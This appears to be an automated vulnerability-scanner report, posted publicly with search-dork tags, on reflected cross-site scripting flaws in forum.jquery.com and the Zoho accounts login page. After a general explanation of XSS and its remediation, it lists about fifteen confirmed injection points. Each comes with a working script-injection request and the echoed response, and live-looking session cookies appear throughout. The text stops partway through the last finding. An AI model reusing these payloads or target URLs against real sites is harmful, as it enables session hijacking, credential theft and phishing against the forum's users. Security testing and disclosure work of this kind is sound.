XSS, Cross Site Scripting in forum.jquery.com, CWE-79, CAPEC-86, DORK, GHDB

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. https://accounts.zoho.com/login [serviceurl parameter] next

Summary

Severity:	High
Confidence:	Firm
Host:	https://accounts.zoho.com
Path:	/login

Issue detail

The value of the serviceurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4a37d'><a%20b%3dc>17750179308 was submitted in the serviceurl parameter. This input was echoed as 4a37d'><a b=c>17750179308 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /login?service_language=default&hide_signup=true&servicename=ZohoDiscussions&serviceurl=http://forum.jquery.com4a37d'><a%20b%3dc>17750179308 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://forum.jquery.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: accounts.zoho.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=e47ba0bd-72d2-418c-a842-a99577ce1f9b; Path=/
Set-Cookie: JSESSIONID=0CA38E6825823BE532CAB2F13BE31D61; Path=/; Secure
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 16 Nov 2010 02:22:44 GMT
Server: ZWS
Content-Length: 21412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">

<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...
<input name="serviceurl" value='http://forum.jquery.com4a37d'><a b=c>17750179308' type="hidden">
...[SNIP]...

1.2. https://accounts.zoho.com/login [serviceurl parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://accounts.zoho.com
Path:	/login

Issue detail

The value of the serviceurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33bbc'%3b576998bc57a was submitted in the serviceurl parameter. This input was echoed as 33bbc';576998bc57a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login?service_language=default&hide_signup=true&servicename=ZohoDiscussions&serviceurl=http://forum.jquery.com33bbc'%3b576998bc57a HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://forum.jquery.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: accounts.zoho.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=3ad80424-3c75-452b-8ceb-f86f7a918fac; Path=/
Set-Cookie: JSESSIONID=BBB8B69C0B24C0DD838C70BF6607C3A2; Path=/; Secure
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 16 Nov 2010 02:22:52 GMT
Server: ZWS
Content-Length: 21370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">

<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...
://")==0){iurl=iurl.replace("http://", "https://");window.location.href=iurl;}
}

var enableReload = true;
var serviceurl = 'http://forum.jquery.com33bbc';576998bc57a';
var servicename ='ZohoDiscussions';
var domain_label='null';
var domain_suffix='null';
var partner_domain='null';
var hidesecure = 'null';
...[SNIP]...

1.3. http://forum.jquery.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dab2c"><script>alert(1)</script>70e709c8ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?dab2c"><script>alert(1)</script>70e709c8ab=1 HTTP/1.1
Accept: */*
Referer: http://jquery.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forum.jquery.com
Proxy-Connection: Keep-Alive
Cookie: __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmb=44433727.3.10.1289872970; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=44433727

Response

HTTP/1.1 200 OK
Set-Cookie: zdccn=a0838b0d-1f5f-49ff-888a-ca10718e5891; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=53DA00C69F4980139C075CADB1530CED; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 16 Nov 2010 02:07:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 411905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/?dab2c"><script>alert(1)</script>70e709c8ab=1&forumGroupUrl=jquery">
...[SNIP]...

1.4. http://forum.jquery.com/about-the-jquery-forum [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/about-the-jquery-forum

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a72cd"><script>alert(1)</script>44bd9229710 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-the-jquery-forum?a72cd"><script>alert(1)</script>44bd9229710=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=D921CF006107F10E32B711DA86FDCE0E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:40:14 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/about-the-jquery-forum?a72cd"><script>alert(1)</script>44bd9229710=1&forumGroupUrl=jquery">
...[SNIP]...

1.5. http://forum.jquery.com/developing-jquery-mobile [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/developing-jquery-mobile

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c91cc"><script>alert(1)</script>c8ff90e20b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /developing-jquery-mobile?c91cc"><script>alert(1)</script>c8ff90e20b7=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=F8C6AB73BFDC1E6B361E4CAA27CBB1AF; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:40:23 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/developing-jquery-mobile?c91cc"><script>alert(1)</script>c8ff90e20b7=1&forumGroupUrl=jquery">
...[SNIP]...

1.6. http://forum.jquery.com/developing-jquery-plugins [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/developing-jquery-plugins

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97a2f"><script>alert(1)</script>c8203ea5f69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /developing-jquery-plugins?97a2f"><script>alert(1)</script>c8203ea5f69=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0F0DCA2C320392027ABA186A97DD53DC; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:55 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/developing-jquery-plugins?97a2f"><script>alert(1)</script>c8203ea5f69=1&forumGroupUrl=jquery">
...[SNIP]...

1.7. http://forum.jquery.com/jquery-conferences [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/jquery-conferences

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c664"><script>alert(1)</script>0a9ecd3820d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jquery-conferences?4c664"><script>alert(1)</script>0a9ecd3820d=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=A717CC53521CA472F1F8C8E755D3B202; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:54 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/jquery-conferences?4c664"><script>alert(1)</script>0a9ecd3820d=1&forumGroupUrl=jquery">
...[SNIP]...

1.8. http://forum.jquery.com/jquery-mobile [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/jquery-mobile

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e53f7"><script>alert(1)</script>b4e2633d5c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jquery-mobile?e53f7"><script>alert(1)</script>b4e2633d5c3=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=399F4A95A26109EBB254C74243575CBF; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:40:18 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/jquery-mobile?e53f7"><script>alert(1)</script>b4e2633d5c3=1&forumGroupUrl=jquery">
...[SNIP]...

1.9. http://forum.jquery.com/qunit-and-testing [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/qunit-and-testing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51e98"><script>alert(1)</script>74500080afe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /qunit-and-testing?51e98"><script>alert(1)</script>74500080afe=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=34312667F1724C24B1980DBAF3BCC187; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:40:05 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/qunit-and-testing?51e98"><script>alert(1)</script>74500080afe=1&forumGroupUrl=jquery">
...[SNIP]...

1.10. http://forum.jquery.com/topic/how-can-i-help-9-5-2010 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/topic/how-can-i-help-9-5-2010

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbc08"><script>alert(1)</script>b03536d5bca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/how-can-i-help-9-5-2010?fbc08"><script>alert(1)</script>b03536d5bca=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=C11475EE2D052BDA88A8901629E747D6; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:38:40 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/how-can-i-help-9-5-2010?fbc08"><script>alert(1)</script>b03536d5bca=1&forumGroupUrl=jquery">
...[SNIP]...

1.11. http://forum.jquery.com/topic/looking-for-help-on-panel-development [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/topic/looking-for-help-on-panel-development

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4857d"><script>alert(1)</script>7f58095177f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topic/looking-for-help-on-panel-development?4857d"><script>alert(1)</script>7f58095177f=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=2A7E8B2ED43076766C482166352CCB09; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:38:40 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/topic/looking-for-help-on-panel-development?4857d"><script>alert(1)</script>7f58095177f=1&forumGroupUrl=jquery">
...[SNIP]...

1.12. http://forum.jquery.com/user/andrew_powell [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/andrew_powell

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c977"><script>alert(1)</script>f5f11187efd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/andrew_powell?5c977"><script>alert(1)</script>f5f11187efd=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=3681D8CB43F3699E5F2AECE48990B00E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:35:20 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/user/andrew_powell?5c977"><script>alert(1)</script>f5f11187efd=1&forumGroupUrl=jquery">
...[SNIP]...

1.13. http://forum.jquery.com/user/charlietfl [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/charlietfl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61ea0"><script>alert(1)</script>59ffcd43a5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/charlietfl?61ea0"><script>alert(1)</script>59ffcd43a5c=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=10829BB619EFDFB10743E9E4EC66074F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:37:08 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/user/charlietfl?61ea0"><script>alert(1)</script>59ffcd43a5c=1&forumGroupUrl=jquery">
...[SNIP]...

1.14. http://forum.jquery.com/user/christophe [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/christophe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 357cf"><script>alert(1)</script>be52c97770b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/christophe?357cf"><script>alert(1)</script>be52c97770b=1 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=8E5124FF4A399FAE18C9A0C1EB3C9F96; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:37:43 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<a href="/portalLogin.do?serviceurl=/user/christophe?357cf"><script>alert(1)</script>be52c97770b=1&forumGroupUrl=jquery">
...[SNIP]...

1.15. http://forum.jquery.com/user/jeresig [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/user/jeresig

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28ec1"><script>alert(1)</script>bc03636b9be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

